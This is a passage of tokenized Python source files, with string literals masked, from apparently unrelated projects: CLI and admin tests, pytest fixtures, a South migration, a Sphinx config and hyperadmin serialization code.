isolated_filesystem ( ) : <EOL> result = runner . invoke ( cli , [ '<STR_LIT>' ] , catch_exceptions = False , input = '<STR_LIT>' ) <EOL> assert config == { '<STR_LIT:url>' : '<STR_LIT>' } <EOL> result = runner . invoke ( cli , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , catch_exceptions = False ) <EOL> with open ( os . path . join ( str ( tmpdir ) , '<STR_LIT>' ) ) as fd : <EOL> data = json . load ( fd ) <EOL> assert data [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> assert data [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> assert config == { '<STR_LIT:url>' : '<STR_LIT>' } <EOL> def test_scm_source ( monkeypatch , tmpdir ) : <EOL> response = MagicMock ( ) <EOL> response . json . return_value = { '<STR_LIT:url>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> runner = CliRunner ( ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : { '<STR_LIT:url>' : '<STR_LIT>' } ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = '<STR_LIT>' ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = { } ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : x . replace ( '<STR_LIT>' , str ( tmpdir ) ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = response ) ) <EOL> with runner . isolated_filesystem ( ) : <EOL> result = runner . invoke ( cli , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:1.0>' ] , catch_exceptions = False ) <EOL> assert '<STR_LIT>' in result . output <EOL> assert '<STR_LIT>' in result . output <EOL> def test_image ( monkeypatch , tmpdir ) : <EOL> response = MagicMock ( ) <EOL> response . json . return_value = [ { '<STR_LIT:name>' : '<STR_LIT:1.0>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ] <EOL> runner = CliRunner ( ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : { '<STR_LIT:url>' : '<STR_LIT>' } ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = '<STR_LIT>' ) ) <EOL> monkeypatch . 
setattr ( '<STR_LIT>' , lambda x : x . replace ( '<STR_LIT>' , str ( tmpdir ) ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = response ) ) <EOL> with runner . isolated_filesystem ( ) : <EOL> result = runner . invoke ( cli , [ '<STR_LIT:image>' , '<STR_LIT>' ] , catch_exceptions = False ) <EOL> assert '<STR_LIT>' in result . output <EOL> assert '<STR_LIT>' in result . output <EOL> assert '<STR_LIT:1.0>' in result . output <EOL> def test_tags ( monkeypatch , tmpdir ) : <EOL> response = MagicMock ( ) <EOL> response . json . return_value = [ { '<STR_LIT:name>' : '<STR_LIT:1.0>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ] <EOL> runner = CliRunner ( ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : { '<STR_LIT:url>' : '<STR_LIT>' } ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = '<STR_LIT>' ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : x . replace ( '<STR_LIT>' , str ( tmpdir ) ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = response ) ) <EOL> with runner . isolated_filesystem ( ) : <EOL> result = runner . invoke ( cli , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , catch_exceptions = False ) <EOL> assert '<STR_LIT:1.0>' in result . output <EOL> def test_latest ( monkeypatch , tmpdir ) : <EOL> response = MagicMock ( ) <EOL> response . json . return_value = [ <EOL> { '<STR_LIT:name>' : '<STR_LIT:1.0>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ] <EOL> runner = CliRunner ( ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : { '<STR_LIT:url>' : '<STR_LIT>' } ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = '<STR_LIT>' ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = { '<STR_LIT>' : '<STR_LIT>' } ) ) <EOL> monkeypatch . 
setattr ( '<STR_LIT>' , MagicMock ( return_value = response ) ) <EOL> with runner . isolated_filesystem ( ) : <EOL> result = runner . invoke ( cli , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , catch_exceptions = False ) <EOL> assert '<STR_LIT:1.0>' == result . output . rstrip ( ) <EOL> def test_latest_not_found ( monkeypatch , tmpdir ) : <EOL> response = MagicMock ( ) <EOL> response . raise_for_status . side_effect = Exception ( '<STR_LIT>' ) <EOL> runner = CliRunner ( ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : { '<STR_LIT:url>' : '<STR_LIT>' } ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = '<STR_LIT>' ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = { '<STR_LIT>' : '<STR_LIT>' } ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = response ) ) <EOL> with runner . isolated_filesystem ( ) : <EOL> result = runner . invoke ( cli , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , catch_exceptions = False ) <EOL> assert '<STR_LIT:None>' == result . output . rstrip ( ) <EOL> def test_url_without_scheme ( monkeypatch , tmpdir ) : <EOL> response = MagicMock ( ) <EOL> response . json . return_value = [ { '<STR_LIT:name>' : '<STR_LIT:1.0>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ] <EOL> def get ( url , ** kwargs ) : <EOL> assert url == '<STR_LIT>' <EOL> return response <EOL> runner = CliRunner ( ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = '<STR_LIT>' ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : x . replace ( '<STR_LIT>' , str ( tmpdir ) ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , get ) <EOL> with runner . isolated_filesystem ( ) : <EOL> result = runner . invoke ( cli , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , catch_exceptions = False ) <EOL> assert '<STR_LIT:1.0>' in result . output </s>
<s> """<STR_LIT>""" <EOL> import setuptools <EOL> import setup <EOL> from setup import VERSION , DESCRIPTION , LICENSE , URL , AUTHOR , EMAIL , KEYWORDS , CLASSIFIERS <EOL> NAME = '<STR_LIT>' <EOL> def setup_package ( ) : <EOL> version = VERSION <EOL> install_reqs = [ setup . NAME ] <EOL> setuptools . setup ( <EOL> name = NAME , <EOL> version = version , <EOL> url = URL , <EOL> description = DESCRIPTION , <EOL> author = AUTHOR , <EOL> author_email = EMAIL , <EOL> license = LICENSE , <EOL> keywords = KEYWORDS , <EOL> long_description = '<STR_LIT>' . format ( setup . NAME ) , <EOL> classifiers = CLASSIFIERS , <EOL> packages = [ ] , <EOL> install_requires = install_reqs , <EOL> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> setup_package ( ) </s>
<s> import json <EOL> import logging <EOL> import pathlib <EOL> from connexion . app import App <EOL> import pytest <EOL> logging . basicConfig ( level = logging . DEBUG ) <EOL> TEST_FOLDER = pathlib . Path ( __file__ ) . parent <EOL> FIXTURES_FOLDER = TEST_FOLDER / '<STR_LIT>' <EOL> SPEC_FOLDER = TEST_FOLDER / "<STR_LIT>" <EOL> class FakeResponse ( object ) : <EOL> def __init__ ( self , status_code , text ) : <EOL> """<STR_LIT>""" <EOL> self . status_code = status_code <EOL> self . text = text <EOL> self . ok = status_code == <NUM_LIT:200> <EOL> def json ( self ) : <EOL> return json . loads ( self . text ) <EOL> @ pytest . fixture <EOL> def oauth_requests ( monkeypatch ) : <EOL> def fake_get ( url , params = None , timeout = None ) : <EOL> """<STR_LIT>""" <EOL> params = params or { } <EOL> if url == "<STR_LIT>" : <EOL> token = params [ '<STR_LIT>' ] <EOL> if token == "<STR_LIT:100>" : <EOL> return FakeResponse ( <NUM_LIT:200> , '<STR_LIT>' ) <EOL> if token == "<STR_LIT>" : <EOL> return FakeResponse ( <NUM_LIT:200> , '<STR_LIT>' ) <EOL> if token == "<STR_LIT>" : <EOL> return FakeResponse ( <NUM_LIT> , '<STR_LIT>' ) <EOL> return url <EOL> monkeypatch . setattr ( '<STR_LIT>' , fake_get ) <EOL> @ pytest . fixture <EOL> def app ( ) : <EOL> app = App ( __name__ , <NUM_LIT> , SPEC_FOLDER , debug = True ) <EOL> app . add_api ( '<STR_LIT>' , validate_responses = True ) <EOL> return app <EOL> @ pytest . fixture <EOL> def simple_api_spec_dir ( ) : <EOL> return FIXTURES_FOLDER / '<STR_LIT>' <EOL> @ pytest . fixture <EOL> def problem_api_spec_dir ( ) : <EOL> return FIXTURES_FOLDER / '<STR_LIT>' <EOL> @ pytest . fixture <EOL> def simple_app ( simple_api_spec_dir ) : <EOL> app = App ( __name__ , <NUM_LIT> , simple_api_spec_dir , debug = True ) <EOL> app . add_api ( '<STR_LIT>' , validate_responses = True ) <EOL> return app <EOL> @ pytest . 
fixture <EOL> def problem_app ( problem_api_spec_dir ) : <EOL> app = App ( __name__ , <NUM_LIT> , problem_api_spec_dir , debug = True ) <EOL> app . add_api ( '<STR_LIT>' , validate_responses = True ) </s>
<s> import turnstile . checks as checks <EOL> import turnstile . common . output as output <EOL> import turnstile . models . specifications as specifications <EOL> @ checks . Check ( '<STR_LIT>' ) <EOL> def check ( user_configuration , repository_configuration , commit_message ) : <EOL> """<STR_LIT>""" <EOL> logger = output . get_sub_logger ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> logger . debug ( '<STR_LIT>' ) <EOL> logger . debug ( '<STR_LIT>' , commit_message . message ) <EOL> if commit_message . message . startswith ( '<STR_LIT>' ) : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> raise checks . CheckIgnore <EOL> check_options = repository_configuration . get ( '<STR_LIT>' , { } ) <EOL> allowed_schemes = check_options . get ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> allowed_formats = check_options . get ( '<STR_LIT>' , { '<STR_LIT>' } ) <EOL> logger . debug ( "<STR_LIT>" , allowed_schemes ) <EOL> result = checks . CheckResult ( ) <EOL> specification = specifications . get_specification ( commit_message . message , allowed_formats , allowed_schemes ) <EOL> is_valid_uri = specification . valid <EOL> logger . debug ( '<STR_LIT>' , specification ) <EOL> logger . debug ( "<STR_LIT>" , is_valid_uri ) <EOL> result . successful = is_valid_uri <EOL> if not is_valid_uri : <EOL> result . add_detail ( '<STR_LIT>' . format ( spec = specification ) ) <EOL> return result </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT>' , <EOL> self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT:default>' , max_length = <NUM_LIT> , blank = True ) , <EOL> keep_default = False ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : 
"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> 
'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:body>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from django . core . urlresolvers import reverse <EOL> class Breadcrumb ( object ) : <EOL> def __init__ ( self , name , url = None ) : <EOL> self . name = name <EOL> self . url = url <EOL> def get_absolute_url ( self ) : <EOL> if not isinstance ( self . url , basestring ) : <EOL> if len ( self . url ) > <NUM_LIT:1> : <EOL> return reverse ( self . url [ <NUM_LIT:0> ] , args = self . url [ <NUM_LIT:1> ] , kwargs = self . url [ <NUM_LIT:2> ] ) <EOL> return reverse ( * self . url ) <EOL> return self . url </s>
<s> class BaseDocumentQuery ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , query_index , backend = None ) : <EOL> self . query_index = query_index <EOL> self . _backend = backend <EOL> @ property <EOL> def document ( self ) : <EOL> return self . query_index . document <EOL> @ property <EOL> def backend ( self ) : <EOL> if self . _backend : <EOL> return self . _backend <EOL> return self . document . _meta . get_index_backend_for_read ( self . query_index ) <EOL> def _get_indexer_for_operation ( self , document , op ) : <EOL> return self . backend . _get_indexer_for_operation ( document , op ) <EOL> def __len__ ( self ) : <EOL> raise NotImplementedError <EOL> def count ( self ) : <EOL> return self . __len__ ( ) <EOL> def exists ( self ) : <EOL> return bool ( self . __len__ ( ) ) <EOL> def delete ( self ) : <EOL> raise NotImplementedError <EOL> def get ( self , ** kwargs ) : <EOL> filter_operations = self . query_index . _parse_kwargs ( kwargs ) <EOL> return self . get_from_filter_operations ( filter_operations ) <EOL> def get_from_filter_operations ( self , filter_operations ) : <EOL> raise NotImplementedError <EOL> def values ( self , * limit_to , ** kwargs ) : <EOL> raise NotImplementedError <EOL> def __getitem__ ( self , val ) : <EOL> raise NotImplementedError <EOL> def __nonzero__ ( self ) : <EOL> raise NotImplementedError <EOL> class QuerySet ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , query ) : <EOL> self . query = query <EOL> @ property <EOL> def document ( self ) : <EOL> return self . query . document <EOL> def __len__ ( self ) : <EOL> return self . query . __len__ ( ) <EOL> def count ( self ) : <EOL> return self . __len__ ( ) <EOL> def delete ( self ) : <EOL> return self . query . delete ( ) <EOL> def values ( self , * limit_to , ** kwargs ) : <EOL> return self . query . values ( * limit_to , ** kwargs ) <EOL> def get ( self , ** kwargs ) : <EOL> return self . query . 
get ( ** kwargs ) <EOL> def exists ( self ) : <EOL> return self . query . exists ( ) <EOL> def __getitem__ ( self , val ) : <EOL> return self . query . __getitem__ ( val ) <EOL> def __nonzero__ ( self ) : <EOL> return self . query . __nonzero__ ( ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . query ) </s>
<s> from django . utils import unittest <EOL> from django . test . client import RequestFactory <EOL> from django . contrib . auth . models import User <EOL> from django . contrib import admin <EOL> from dockit . admin . documentadmin import DocumentAdmin , SchemaAdmin <EOL> from common import SimpleDocument , SimpleSchema <EOL> class MockView : <EOL> def __init__ ( self , request ) : <EOL> self . request = request <EOL> def dotpath ( self ) : <EOL> return None <EOL> def next_dotpath ( self ) : <EOL> return None <EOL> class AdminFormFieldTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . admin_model = DocumentAdmin ( SimpleDocument , admin . site , schema = SimpleDocument ) <EOL> self . schema_model = SchemaAdmin ( SimpleDocument , admin . site , schema = SimpleSchema , documentadmin = self . admin_model ) <EOL> self . factory = RequestFactory ( ) <EOL> User . objects . all ( ) . delete ( ) <EOL> self . super_user = User . objects . create ( is_staff = True , is_active = True , is_superuser = True , username = '<STR_LIT>' ) <EOL> def test_formfield_for_field_with_complex_list_field ( self ) : <EOL> request = self . factory . get ( '<STR_LIT:/>' ) <EOL> prop = SimpleDocument . _meta . fields [ '<STR_LIT>' ] <EOL> field = prop . get_form_field_class ( ) <EOL> kwargs = prop . formfield_kwargs ( ) <EOL> kwargs [ '<STR_LIT>' ] = request <EOL> view = MockView ( request ) <EOL> admin_field = self . admin_model . formfield_for_field ( prop , field , view , ** kwargs ) <EOL> field_html = admin_field . widget . render ( '<STR_LIT>' , [ ] ) <EOL> self . assertTrue ( '<STR_LIT>' in field_html ) <EOL> def test_inline_form_field_for_field_with_complex_list_field ( self ) : <EOL> request = self . factory . get ( '<STR_LIT:/>' ) <EOL> instances = self . admin_model . get_default_inline_instances ( ) <EOL> self . assertEqual ( len ( instances ) , <NUM_LIT:1> ) <EOL> inline_admin = instances [ <NUM_LIT:0> ] <EOL> prop = inline_admin . schema . _meta . 
fields [ '<STR_LIT>' ] <EOL> field = prop . get_form_field_class ( ) <EOL> kwargs = prop . formfield_kwargs ( ) <EOL> kwargs [ '<STR_LIT>' ] = request <EOL> view = MockView ( request ) <EOL> admin_field = inline_admin . formfield_for_field ( prop , field , view , ** kwargs ) <EOL> assert admin_field . dotpath , str ( admin_field . dotpath ) <EOL> field_html = admin_field . widget . render ( '<STR_LIT>' , [ ] ) <EOL> self . assertTrue ( '<STR_LIT>' in field_html ) <EOL> def test_inline_get_formset ( self ) : <EOL> request = self . factory . get ( '<STR_LIT:/>' ) <EOL> instances = self . admin_model . get_default_inline_instances ( ) <EOL> self . assertEqual ( len ( instances ) , <NUM_LIT:1> ) <EOL> view = MockView ( request ) <EOL> inline_admin = instances [ <NUM_LIT:0> ] <EOL> formset = inline_admin . get_formset ( request , view = view ) <EOL> html = list ( ) <EOL> for form in formset ( instance = SimpleDocument ( ) ) : <EOL> assert form . _meta . formfield_callback <EOL> html . append ( form . as_table ( ) ) <EOL> html = '<STR_LIT:\n>' . join ( html ) <EOL> self . assertTrue ( '<STR_LIT>' in html , html ) </s>
<s> import sys , os <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT:.>' ) ) <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> extensions = [ '<STR_LIT>' ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> from hyperadmin import get_version <EOL> version = get_version ( include_sub = False ) <EOL> release = get_version ( ) <EOL> exclude_patterns = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> autodoc_member_order = '<STR_LIT>' </s>
<s> from __future__ import absolute_import <EOL> import io <EOL> from django import http <EOL> from datatap . datataps import StreamDataTap <EOL> from hyperadmin . mediatypes . common import MediaType <EOL> class DataTap ( MediaType ) : <EOL> def __init__ ( self , api_request , datatap_class , ** kwargs ) : <EOL> self . datatap_class = datatap_class <EOL> super ( DataTap , self ) . __init__ ( api_request , ** kwargs ) <EOL> def get_content ( self , form_link , state ) : <EOL> instream = state . get_resource_items ( ) <EOL> datatap = state . endpoint . get_datatap ( instream = instream ) <EOL> serialized_dt = self . datatap_class ( instream = datatap ) <EOL> payload = io . BytesIO ( ) <EOL> serialized_dt . send ( payload ) <EOL> return payload . getvalue ( ) <EOL> def serialize ( self , content_type , link , state ) : <EOL> if self . detect_redirect ( link ) : <EOL> return self . handle_redirect ( link , content_type ) <EOL> content = self . get_content ( link , state ) <EOL> response = http . HttpResponse ( content , content_type ) <EOL> return response <EOL> def get_datatap ( self , request ) : <EOL> if hasattr ( request , '<STR_LIT:body>' ) : <EOL> payload = request . body <EOL> else : <EOL> payload = request . raw_post_data <EOL> return self . datatap_class ( StreamDataTap ( io . BytesIO ( payload ) ) ) <EOL> def deserialize ( self , request ) : <EOL> datatap = self . get_datatap ( request ) <EOL> data = list ( datatap ) [ <NUM_LIT:0> ] <EOL> return { '<STR_LIT:data>' : data , <EOL> '<STR_LIT>' : request . FILES , } </s>
